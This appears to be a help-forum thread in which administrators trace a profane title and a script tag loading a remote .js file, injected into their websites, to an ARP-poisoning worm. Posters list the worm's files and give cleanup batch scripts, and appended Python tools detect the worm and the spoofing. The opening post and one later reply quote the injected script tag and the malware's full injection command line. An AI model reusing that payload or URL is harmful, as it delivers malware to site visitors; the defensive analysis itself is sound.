  • Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 1592

IIS server hacked "fuck th3 w0rld" entered into title - cannot find infection anywhere

Hi, my web servers, all IIS, have been compromised. We are not sure how, although we think it may have been SQL injection. The following text,

"Fuck Th3 W0rld!", is injected into the source code of every Java-enabled website. We cannot clean it nor find the source of the spreading. Here is the Java source: <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>**** Th3 W0rld!</title> <HTML>

I have run spyware scans and virus scans, and cannot determine where the infection is coming from,
and I have had to stop my web servers. Does anybody have any clue?

This is an emergency.
0
Asked by: blueswitch
1 Solution
 
moorhouselondon commented:
I'm sure you've done this already, but...

First off, turn off access to your site; no one is going to thank you for screwing up their system.
0
 
blueswitch (Author) commented:
That has already been done. Now I'm trying anything and everything to find the infection.
0
 
moorhouselondon commented:
Your website has an SQL engine embedded in it? If so, check that parameters sent to the engine are properly validated. As I understand it, SQL injection is about putting formatting characters into a form. The contents of that form are served up to the SQL engine, the engine executes the command, but that command now contains a very different type of command to what you intended it to contain. So what you've got to do is to strip out all characters that could set up such a command.
0
 
blueswitch (Author) commented:
Our problem is that the hack has already happened; IIS has been compromised.
The database and code are OK.

When I move the database and code to a clean server, the site is normal again,
so my only conclusion is that the server has somehow been modified. However, I can't find it.
0
 
moorhouselondon commented:
Have you checked things like Stored Procedures?
0
 
blueswitch (Author) commented:
No,

but as I mentioned, I have physically moved all database files, as well as the web code, to a previously uninfected machine, and the infection does not follow.
Also it affects ASP pages not using databases, so I have determined that it is infecting IIS.
0
 
moorhouselondon commented:
Whether or not IIS is still infected: if a hacker repeats the injection technique on this new server, are you still vulnerable?  Code that deals with input from outside sources needs to be checked to ensure input is thoroughly sanitised.
0
 
blueswitch (Author) commented:
Agreed, but for now we need to be able to get the sites back up.
0
 
moorhouselondon commented:
not a pleasant Sunday for you...
0
 
blueswitch (Author) commented:
not at all
0
 
blueswitch (Author) commented:
Interesting.

Here I think it's a variant of those attacks where they managed to get the IIS server infected.
0
 
blueswitch (Author) commented:
These are very interesting, but the problem is I have a new variant, and my IIS is infected.
I'm really at a standstill.
0
 
moorhouselondon commented:
The articles suggested looking through the logs - you know roughly when the infection started, have a look at transactions occurring a tad prior to that time.  If you don't have the logs then you will need to set the system going and monitor it stringently until it gets infected again.
0
 
adds21 commented:
Okay. We've now fixed our problem.

Firstly, it would appear there is nothing running on the web servers themselves. It looks to me like a process running on the SQL Server is affecting the IIS machines (maybe via DCOM?).

In our case, we found that rebooting the SQL Server machine *and not logging onto it* fixed the problem.  As soon as someone logged onto the machine either via TS, or on the console, the problem came back.

So, we looked at the /run regkey, and sure enough it was running an unknown process at user login. I'm sorry, I can't remember what the process was called (I just wanted to delete it!), but that has now fixed our problem.

Of course, we also had a number of other nasties on the SQL server which need to be sorted, but at least we have a little more time to fix that.

So, I would recommend looking very closely at your SQL servers.  Turn them off if necessary and see if the problem goes away on the web servers.  If it does, at least you know where to look.

It's been a long night!
0
 
moorhouselondon commented:
Good news indeed.  The SQL coding needs to be reviewed for vulnerabilities, as mentioned.

You shouldn't be running two accounts on EE.  I suggest you do something about that too!
0
 
stephenevans commented:
Long night indeed. Thanks adds21, your post pointed me in the right direction. If you find more information, please do post it. I'm back up and running but not sure how; with all the things I tried, I'm not sure which one sorted the issue.
0
 
blueswitch (Author) commented:
adds21,
what did you find? If it's on the SQL server, what was the process called?

What do I look for?

0
 
blueswitch (Author) commented:
I just restarted my SQL server; it didn't seem to have any effect. I didn't see any process.
0
 
moorhouselondon commented:
Blueswitch:

Are you doing this on the new, uninfected machine, or the infected one?
0
 
blueswitch (Author) commented:
On the infected one. I have many web and SQL servers; here's what I have found out so far:

1. The infection has some type of logic, as it will not show the profanity in the title if the IP of the computer browsing the site is on the same subnet as the infected machine.

Meaning, all local machines on my network do not see the profanity on all the sites.
This has been verified by using a load balancer, which masks the user IP and makes it appear as an internal user; when I placed an infected machine behind the load balancer, the outside world did not see the profanity.

2. I think it's on the web server and IIS, not SQL, as when I used a clean IIS machine (that has SQL installed)
and used that, while transferring the entire database folder, including the master, msdb etc., to the IIS machine from an infected machine, the problem went away.

0
 
blueswitch (Author) commented:
One more thing: it only affects port 80,
so if the site is under SSL the hack does not take effect.
Has anybody else been affected?
0
 
blueswitch (Author) commented:
OK,

the problem has been resolved. The problem is on the SQL server, as posted above. It's an ARP attack:
a SQL injection attack installs an executable on one of the SQL servers;
that SQL server becomes a pseudo gateway, intercepting all web traffic and appending the code above.

It does not modify SQL or IIS in any way.


0
 
blueswitch (Author) commented:
Additionally, while it may appear many machines are infected, only one is infected (a SQL server),
and it has some program running that is intercepting the ARP traffic and causing all the problems.

Isaac
0
 
stephenevans commented:
As an update, I've been unable to find the source of the SQL injection, but scanning the SQL Server for files modified on Sat 21st 2008 at 7pm I found files relating to the following:

http://www.sophos.com/security/analyses/viruses-and-spyware/w32rbotgvm.html

wpcap.dll and the other files can indeed enable uploaded files to access the network card at the network level and hence mess with ARP and other traffic.

Stephen
0
 
RandyMontgomery commented:
blueswitch,

What is the name of the exe? I still cannot find it on any of my servers.
0
 
stephenevans commented:
The EXE was called wapsrv.exe; it had a created date of the 21st. The full list of files that were created is as follows:

System32\drivers\npf.sys
System32\packet.dll
System32\wpcap.dll
System32\wanpacket.dll
System32\wapsrv.exe
0
 
RTPIT commented:
Thank you stephenevans! Finally a real fix instead of the 'I fixed it but have no clue what I did or how it works' posts we had been seeing.
0
 
RTPIT commented:
I found the culprit. I made 2 scripts, one for 2000 and one for XP/Server.

2000.bat
rem Windows 2000 keeps its system directory under C:\WINNT.
rem Removes the WinPcap components (packet.dll, wanpacket.dll, wpcap.dll, npf.sys)
rem and the injector binary (wapsrv.exe) listed by stephenevans above.
del c:\WINNT\system32\packet.dll
del c:\WINNT\system32\wanpacket.dll
del c:\WINNT\system32\wapsrv.exe
del c:\WINNT\system32\wpcap.dll
del c:\WINNT\system32\drivers\npf.sys
rem Keep the window open so any "Access is denied" message can be read.
pause

XP/Server
rem Same file list; XP and Server keep the system directory under C:\WINDOWS.
del c:\windows\system32\packet.dll
del c:\windows\system32\wanpacket.dll
del c:\windows\system32\wapsrv.exe
del c:\windows\system32\wpcap.dll
del c:\windows\system32\drivers\npf.sys
rem Keep the window open so any "Access is denied" message can be read.
pause

These batches did find some files and delete them, but eventually I found one machine with "access denied" on the deletion. After looking over the processes, there was only one svchost.exe process run by the local user account; its switches were:

C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script><title>Fuck Th3 W0rld!</title>"

Thanks again stephenevans
0
 
RTPIT commented:
svchost.exe was being run from c:\windows\system32\waptimes.exe

Triggered from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
0
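The two findings above (a process named svchost.exe carrying "-ip ... -port 80 -insert <html>" arguments, and a Run-key value launching waptimes.exe) can be turned into a triage check. The following is an added example, not code from the thread or from any of the posters: it runs over a constructed process list and a constructed set of Run-key values shaped like what RTPIT reported. Only the file names from the thread (wapsrv.exe, waptimes.exe, wpcap.dll, packet.dll, wanpacket.dll, npf.sys) and the injected script URL are taken from the posts; PIDs, paths and the other entries are made up. On a live host you would feed it the output of Process Explorer or `wmic process get ProcessId,ExecutablePath,CommandLine,ParentProcessId` and the contents of HKLM\...\CurrentVersion\Run.

```python
"""Triage Windows process command lines and Run-key entries for the
HTTP-injection tool described in this thread (added example, not thread code)."""
import re
from pathlib import PureWindowsPath

# File names reported in the thread as belonging to the injector and its WinPcap components.
THREAD_IOC_FILENAMES = {"wapsrv.exe", "waptimes.exe", "wpcap.dll",
                        "packet.dll", "wanpacket.dll", "npf.sys"}

# A genuine svchost.exe is started by services.exe and takes "-k <service group>".
LEGIT_SVCHOST_ARGS = re.compile(r"^-k\s+\S+", re.IGNORECASE)
# Things that never belong in a process command line: HTML/script tags or an "-insert" switch.
INJECTION_MARKERS = re.compile(r"<script\b|</title>|(^|\s)-insert\s", re.IGNORECASE)

# Constructed sample process list: (pid, image_path, command_line, parent_image_path).
SAMPLE_PROCESSES = [
    (900, r"C:\WINDOWS\system32\svchost.exe",
     r"C:\WINDOWS\system32\svchost.exe -k netsvcs",
     r"C:\WINDOWS\system32\services.exe"),
    (1432, r"C:\WINDOWS\system32\svchost.exe",                     # shaped like RTPIT's finding
     r'C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 '
     r'-port 80 -insert "<script src=http://nb88.cn/search/vip.js></script>"',
     r"C:\WINDOWS\system32\waptimes.exe"),
    (1500, r"C:\WINDOWS\system32\lsass.exe",
     r"C:\WINDOWS\system32\lsass.exe",
     r"C:\WINDOWS\system32\winlogon.exe"),
]

# Constructed sample Run-key values: (value_name, data).
SAMPLE_RUN_KEY = [
    ("SoundMan", r"C:\WINDOWS\SOUNDMAN.EXE"),
    ("wap", r"C:\WINDOWS\system32\waptimes.exe"),
]


def split_command_line(command_line):
    """Split a Windows command line into (image_path, argument_string)."""
    cl = command_line.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        if end == -1:
            return cl.strip('"'), ""
        return cl[1:end], cl[end + 1:].strip()
    parts = cl.split(None, 1)
    return parts[0], (parts[1].strip() if len(parts) > 1 else "")


def basename(path):
    return PureWindowsPath(path).name.lower()


def triage_process(image_path, command_line, parent_image):
    """Return the list of reasons this process deserves a look (empty = nothing seen)."""
    reasons = []
    name = basename(image_path)
    _, args = split_command_line(command_line)
    if name == "svchost.exe":
        if not LEGIT_SVCHOST_ARGS.match(args):
            reasons.append("svchost.exe with non-standard arguments")
        if basename(parent_image) != "services.exe":
            reasons.append("svchost.exe not started by services.exe")
    if INJECTION_MARKERS.search(command_line):
        reasons.append("HTML/script payload in command line")
    if name in THREAD_IOC_FILENAMES or basename(parent_image) in THREAD_IOC_FILENAMES:
        reasons.append("file name reported in the thread")
    return reasons


def triage_processes(processes):
    """Return {pid: reasons} for every process that produced at least one reason."""
    findings = {}
    for pid, image, cmdline, parent in processes:
        reasons = triage_process(image, cmdline, parent)
        if reasons:
            findings[pid] = reasons
    return findings


def triage_run_key(entries):
    """Return {value_name: reasons} for Run-key values that launch a reported file
    or carry an injection payload in their command line."""
    findings = {}
    for value_name, data in entries:
        image, _ = split_command_line(data)
        reasons = []
        if basename(image) in THREAD_IOC_FILENAMES:
            reasons.append("file name reported in the thread")
        if INJECTION_MARKERS.search(data):
            reasons.append("HTML/script payload in command line")
        if reasons:
            findings[value_name] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in triage_processes(SAMPLE_PROCESSES).items():
        print(f"PID {pid}: " + "; ".join(reasons))
    for name, reasons in triage_run_key(SAMPLE_RUN_KEY).items():
        print(f"Run\\{name}: " + "; ".join(reasons))
```

The svchost rule is the general one worth keeping after this incident: a real svchost.exe is always a child of services.exe and its arguments always begin with `-k`; either condition failing is reason enough to pull the binary and its parent for inspection, whatever the file is called.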
 
RandyMontgomery commented:
First of all, thank you all for your input.

I checked every server on my network and none of the following files "packet.dll, wanpacket.dll, wapsrv.exe, wpcap.dll, npf.sys and waptimes.exe" were found on my servers. I also checked my processes using Process Explorer on each server and did not find anything abnormal. The virus seems to come and go, and when it's active it severely slows down the internet and LAN/WAN traffic. I even tried Wireshark to find the misc traffic from each server. Symantec stops the VIP.js and its other names on the workstations. Are any of your admins running Symantec Endpoint Protection on your network? Any other comments, ideas, thoughts to eradicate this bug?
0
 
RTPIT commented:
It doesn't have to be a server; the machine that we ended up finding it running on was an XP client PC.

If you can't find it via software, try to isolate it with hardware: try to segment off some of the network with, say, another router. Eventually you'll see some computers still affected while others won't be; maybe segment off a specific section of a building or an office.
0
 
RandyMontgomery commented:
I was under the impression that it was a server virus; thanks for the information. What anti-virus software are you running on the workstations?
0
 
Mohamed Osama, Senior IT Consultant, commented:
For the sake of Google & search engines:

http://www.symantec.com/security_response/writeup.jsp?docid=2007-061222-0609-99

This is the original culprit, a low-profile worm that injects malicious HTML code into local HTTP traffic using ARP poisoning attacks. The IFrames injected differ, but the payload is usually executing JS/VBS trojan downloaders; McAfee detects it as Trojan VBS/PSYME, Kaspersky detects it as Trojan-Downloader.JS.Multi.cn.
Upon execution this will download further malware, some of which was extremely difficult to remove.

I cleaned up an infected LAN today by running Wireshark for a couple of minutes, identified the machine(s) which are performing the ARP spoofing & going there for a hands-on cleanup; once cleaned, other users who experienced the VBS/PSYME message
0
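Both blueswitch's conclusion (one infected host acting as a pseudo gateway by intercepting ARP, with port 80 traffic rewritten on the way through) and Mohamed Osama's cleanup method (watch ARP in Wireshark for a few minutes and go to the machine that is answering for everyone) come down to two symptoms visible in ARP traffic: one IP address answered by more than one MAC, and one MAC answering for far more IPs than a normal host would. The following is an added example, not code from the thread or from any poster: it parses a constructed log in the shape `tcpdump -n` prints for ARP (all addresses made up; the spoofing MAC aa:bb:cc:dd:ee:ff and the 192.168.5.0/24 range are chosen to mirror the `-ip 192.168.5.1-192.168.5.255` switch reported above) and reports which MAC best explains the conflicts. Against a real capture you would run `tcpdump -n -i <iface> arp` for a few minutes and pipe the output in.

```python
"""Spot ARP-spoofing symptoms in a log of ARP replies (added example, not thread code)."""
import re
from collections import defaultdict

# Matches the shape tcpdump uses for ARP replies; requests ("who-has") are ignored.
ARP_REPLY = re.compile(
    r"^(?P<ts>\S+)\s+ARP, Reply (?P<ip>\d+\.\d+\.\d+\.\d+) is-at (?P<mac>[0-9a-f:]{17})",
    re.IGNORECASE,
)

# Constructed sample capture: three hosts answer for themselves, then one MAC
# answers for the gateway and every other host it has seen.
SAMPLE_ARP_LOG = """\
12:00:00.000100 ARP, Reply 192.168.5.1 is-at 00:11:22:33:44:01, length 46
12:00:00.300200 ARP, Reply 192.168.5.10 is-at 00:11:22:33:44:10, length 46
12:00:00.600300 ARP, Reply 192.168.5.20 is-at 00:11:22:33:44:20, length 46
12:00:01.000400 ARP, Request who-has 192.168.5.30 tell 192.168.5.10, length 46
12:00:01.100500 ARP, Reply 192.168.5.1 is-at aa:bb:cc:dd:ee:ff, length 46
12:00:01.200600 ARP, Reply 192.168.5.10 is-at aa:bb:cc:dd:ee:ff, length 46
12:00:01.300700 ARP, Reply 192.168.5.20 is-at aa:bb:cc:dd:ee:ff, length 46
12:00:01.400800 ARP, Reply 192.168.5.30 is-at aa:bb:cc:dd:ee:ff, length 46
12:00:02.000900 ARP, Reply 192.168.5.40 is-at 00:11:22:33:44:40, length 46
"""


def ip_key(ip):
    """Sort key so 192.168.5.10 sorts after 192.168.5.1, not before it."""
    return tuple(int(part) for part in ip.split("."))


def parse_arp_log(text):
    """Return a list of (timestamp, ip, mac) for every ARP reply line in the log."""
    replies = []
    for line in text.splitlines():
        m = ARP_REPLY.match(line)
        if m:
            replies.append((m.group("ts"), m.group("ip"), m.group("mac").lower()))
    return replies


def ips_with_conflicting_macs(replies):
    """Symptom 1: {ip: [macs]} for every IP that more than one MAC claimed."""
    seen = defaultdict(set)
    for _, ip, mac in replies:
        seen[ip].add(mac)
    return {ip: sorted(macs) for ip, macs in seen.items() if len(macs) > 1}


def macs_claiming_many_ips(replies, threshold=3):
    """Symptom 2: {mac: [ips]} for every MAC that answered for >= threshold distinct IPs.
    A router legitimately answers for a few addresses; a host answering for a whole
    subnet is what the injector in this thread does."""
    claims = defaultdict(set)
    for _, ip, mac in replies:
        claims[mac].add(ip)
    return {mac: sorted(ips, key=ip_key) for mac, ips in claims.items()
            if len(ips) >= threshold}


def likely_spoofer(replies):
    """Return the MAC that appears in the most conflicting IPs, or None if there is
    no MAC involved in more than one conflict (a single conflict can be a
    legitimate address change)."""
    score = defaultdict(int)
    for macs in ips_with_conflicting_macs(replies).values():
        for mac in macs:
            score[mac] += 1
    if not score:
        return None
    mac, hits = max(score.items(), key=lambda kv: kv[1])
    return mac if hits > 1 else None


if __name__ == "__main__":
    parsed = parse_arp_log(SAMPLE_ARP_LOG)
    print("IPs answered by more than one MAC:", ips_with_conflicting_macs(parsed))
    print("MACs answering for many IPs:", macs_claiming_many_ips(parsed))
    print("likely spoofer:", likely_spoofer(parsed))
```

Once a MAC is named, the switch's MAC address table (or a DHCP lease list) gives the physical port and host, which is the "going there for a hands-on cleanup" step; the same MAC should then show up in the Run key and file listings discussed earlier. The subnet-aware behaviour blueswitch observed (internal clients not seeing the injection) does not change this check, because the spoofed ARP replies are sent regardless of who later browses.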
